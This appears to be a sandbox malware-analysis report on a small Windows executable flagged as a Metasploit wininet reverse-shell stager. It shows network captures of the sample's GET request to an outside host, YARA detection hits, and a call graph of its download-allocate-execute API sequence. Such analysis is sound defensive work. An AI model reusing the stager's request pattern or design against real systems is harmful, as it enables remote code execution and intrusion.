                            .jcho0x40000x3d00x400d3df8e69479d1cf00626de02acc9eedaFalse0.8193359375data6.142036294099521IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLLImport
                            KERNEL32.dllVirtualAlloc, ExitProcess

                            Download Network PCAP: filteredfull

                            • Total Packets: 12
                            • 443 (HTTPS)
                            • 53 (DNS)
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 13, 2025 09:53:44.384361029 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:44.384401083 CET4434968374.82.70.131192.168.2.6
                            Mar 13, 2025 09:53:44.384483099 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:44.398005962 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:44.398025036 CET4434968374.82.70.131192.168.2.6
                            Mar 13, 2025 09:53:46.675270081 CET4434968374.82.70.131192.168.2.6
                            Mar 13, 2025 09:53:46.675396919 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:46.763468027 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:46.763504028 CET4434968374.82.70.131192.168.2.6
                            Mar 13, 2025 09:53:46.763788939 CET4434968374.82.70.131192.168.2.6
                            Mar 13, 2025 09:53:46.763889074 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:46.765553951 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:46.812325001 CET4434968374.82.70.131192.168.2.6
                            Mar 13, 2025 09:53:47.207443953 CET4434968374.82.70.131192.168.2.6
                            Mar 13, 2025 09:53:47.207525969 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:47.207550049 CET4434968374.82.70.131192.168.2.6
                            Mar 13, 2025 09:53:47.207619905 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:47.208234072 CET49683443192.168.2.674.82.70.131
                            Mar 13, 2025 09:53:47.208292961 CET4434968374.82.70.131192.168.2.6
                            Mar 13, 2025 09:53:47.208359957 CET49683443192.168.2.674.82.70.131
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 13, 2025 09:53:44.345118999 CET5072953192.168.2.61.1.1.1
                            Mar 13, 2025 09:53:44.360882998 CET53507291.1.1.1192.168.2.6
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 13, 2025 09:53:44.345118999 CET192.168.2.61.1.1.10xb4cStandard query (0)good.comA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 13, 2025 09:53:44.360882998 CET1.1.1.1192.168.2.60xb4cNo error (0)good.com74.82.70.131A (IP address)IN (0x0001)false
                            • cdn123.offseccdn.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.64968374.82.70.1314437004C:\Users\user\Desktop\443_2003_https-df.exe
                            TimestampBytes transferredDirectionData
                            2025-03-13 08:53:46 UTC346OUTGET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1
                            Host: cdn123.offseccdn.com
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                            Cache-Control: no-cache
                            2025-03-13 08:53:47 UTC198INHTTP/1.1 302 Found
                            Date: Thu, 13 Mar 2025 08:53:46 GMT
                            Server: Apache
                            Location: https://www.blackberry.com
                            Content-Length: 210
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            2025-03-13 08:53:47 UTC210INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 61 63 6b 62 65 72 72 79 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.blackberry.com">here</a>.</p></body></html>


                            050100150s020406080100

                            Click to jump to process

                            050100150s0.0051015MB

                            Click to jump to process

                            • File
                            • Registry

                            Click to dive into process behavior distribution

                            Target ID:1
                            Start time:04:53:42
                            Start date:13/03/2025
                            Path:C:\Users\user\Desktop\443_2003_https-df.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\443_2003_https-df.exe"
                            Imagebase:0x140000000
                            File size:7'168 bytes
                            MD5 hash:8D9C0F42BAF129D1B430A01463DD7870
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Metasploit_0f5a852d, Description: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000000.1458091654.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Author: unknown
                            Reputation:low
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Target ID:4
                            Start time:04:53:46
                            Start date:13/03/2025
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 7004 -s 1076
                            Imagebase:0x7ff7dcb80000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Execution Graph

                            Execution Coverage

                            Dynamic/Packed Code Coverage

                            Signature Coverage

                            Execution Coverage:34.2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:12
                            Total number of Limit Nodes:1
                            Show Legend
                            Hide Nodes/Edges
                            execution_graph 52 140004161 InternetOpenA 53 140004186 52->53 59 140004245 HttpOpenRequestA 62 140004272 59->62 60 1400042f4 VirtualAlloc 61 140004319 InternetReadFile 60->61 61->62 62->60 62->61 63 140004347 62->63 54 14000424b HttpOpenRequestA 57 140004272 54->57 55 1400042f4 VirtualAlloc 56 140004319 InternetReadFile 55->56 56->57 57->55 57->56 58 140004347 57->58

                            Callgraph

                            Hide Legend
                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_0000000140004161 1 Function_0000000140004245 2 Function_000000014000424B 3 Function_0000000140004000

                            Executed Functions

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000001.00000002.1865831202.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_140000000_443_2003_https-df.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocFileInternetReadVirtual
                            • String ID:
                            • API String ID: 3591508208-0
                            • Opcode ID: d12b91be1f377b51e2d5e9a127600f2aa2d3ef4ff5cd3ffab96600ccc3195469
                            • Instruction ID: 00beb425c6c815f18323cc53832ec41728588e8003292604363aacf73a5263bb
                            • Opcode Fuzzy Hash: d12b91be1f377b51e2d5e9a127600f2aa2d3ef4ff5cd3ffab96600ccc3195469
                            • Instruction Fuzzy Hash: E11125F130028959FB1393A7BE36BF911486B48FC4F894020BF055B6E2F9288690824C

                            Control-flow Graph

                            APIs
                            • HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000,?,00000000), ref: 000000014000426A
                              • Part of subcall function 00000001400042B6: VirtualAlloc.KERNELBASE ref: 0000000140004310
                              • Part of subcall function 00000001400042B6: InternetReadFile.WININET(00000000,00000000), ref: 0000000140004333
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000001.00000002.1865831202.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_140000000_443_2003_https-df.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                            • String ID: A$U.;
                            • API String ID: 1187293180-4043418643
                            • Opcode ID: b63501966926f8b01a0b9fc76b6447a0cee4866ebbb465211c8b40e6c4fe0d8d
                            • Instruction ID: be4982e0a486cb758df7c19ec863a11ba1af1556f481e9f2047e650850e32e87
                            • Opcode Fuzzy Hash: b63501966926f8b01a0b9fc76b6447a0cee4866ebbb465211c8b40e6c4fe0d8d
                            • Instruction Fuzzy Hash: A001F5F23002886DF712C6B7A921FBD2715B359FD0F8E5060BF055B6E2E9189A448209

                            Control-flow Graph

                            APIs
                            • HttpOpenRequestA.WININET(00000000,00000000,84A83200,00000000,?,00000000), ref: 000000014000426A
                              • Part of subcall function 00000001400042B6: VirtualAlloc.KERNELBASE ref: 0000000140004310
                              • Part of subcall function 00000001400042B6: InternetReadFile.WININET(00000000,00000000), ref: 0000000140004333
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000001.00000002.1865831202.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_140000000_443_2003_https-df.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                            • String ID: U.;
                            • API String ID: 1187293180-4213443877
                            • Opcode ID: 29627bb30cf452fdd34bce20e3faa6157c3b1128fe2c696f56fdbffadd6dbd22
                            • Instruction ID: 5f6e67efc3cbf756900b841172bea2473cedc1d77852a62045df7e1721ddbbb2
                            • Opcode Fuzzy Hash: 29627bb30cf452fdd34bce20e3faa6157c3b1128fe2c696f56fdbffadd6dbd22
                            • Instruction Fuzzy Hash: 0B0126F13002486CFB12C2B76D22FFD26587399FD4F8D5120BF064B6E2F9188A44410D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 32 140004161-140004181 InternetOpenA call 14000418f 34 140004186-14000419a 32->34
                            APIs
                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 000000014000417F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1865850778.0000000140004000.00000080.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000001.00000002.1865831202.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_140000000_443_2003_https-df.jbxd
                            Yara matches
                            Similarity
                            • API ID: InternetOpen
                            • String ID: good.com
                            • API String ID: 2038078732-2365120828
                            • Opcode ID: 7253203620dcd85dad3777c5ea19a150f91156b95e1f59e9db5f4b304c0b6218
                            • Instruction ID: 0dc344e9eccd43810a061d402c5a282636e792987776bae9b9dd0be3df35d1d3
                            • Opcode Fuzzy Hash: 7253203620dcd85dad3777c5ea19a150f91156b95e1f59e9db5f4b304c0b6218
                            • Instruction Fuzzy Hash: 1EE0C2B31483C11BF35297A86B71BCD3B25AB17F44F089026AF4043282EA151AA4C105